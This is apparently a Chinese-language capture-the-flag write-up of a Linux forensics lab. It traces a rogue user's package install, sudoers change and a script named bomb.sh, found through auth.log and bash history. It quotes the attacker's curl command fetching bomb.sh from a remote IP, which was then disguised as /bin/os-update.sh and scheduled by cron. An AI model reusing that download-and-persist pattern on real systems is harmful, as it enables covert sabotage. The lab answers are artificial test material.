Task3

用户使用提升的权限在计算机上安装了软件包。根据日志,完整的命令是什么?

cat /var/log/auth.log  |grep install

COMMAND=/usr/bin/apt install dokuwiki

运行上一个命令时,当前工作目录(PWD)是什么?

/home/cybert

Task4

在安装上一个任务中的程序包后创建了哪个用户?

cat /var/log/auth.log  |grep useradd

it-admin

一个用户后来被赋予了sudo特权。sudoers文件是什么时候更新的?

cat /var/log/auth.log  |grep visudo

Dec 28 06:27:34

使用“vi”文本编辑器打开脚本文件。这个文件的名称是什么?

cat /var/log/auth.log  |grep vi

bomb.sh

Task5

创建文件时使用的命令是什么 bomb.sh

cat /home/it-admin/.bash

curl 10.10.158.38:8080/bomb.sh –output bomb.sh

文件已重命名并移动到其他目录。现在这个文件的完整路径是什么?

发现删除bomb.sh之后编辑了crontab

/bin/os-update.sh

上一个问题中的文件最后一次修改是什么时候?

ls -liah /bin/os-update.sh

不知道为什么没有显示具体时间,总之是Dec 28 06:29

执行第一个问题中的文件时将创建的文件的名称是什么?

cat /bin/os-update.sh

goodbye.txt

Task6

恶意文件会在什么时候触发?

cat /etc/crontab

08:00 AM

碎碎念

easy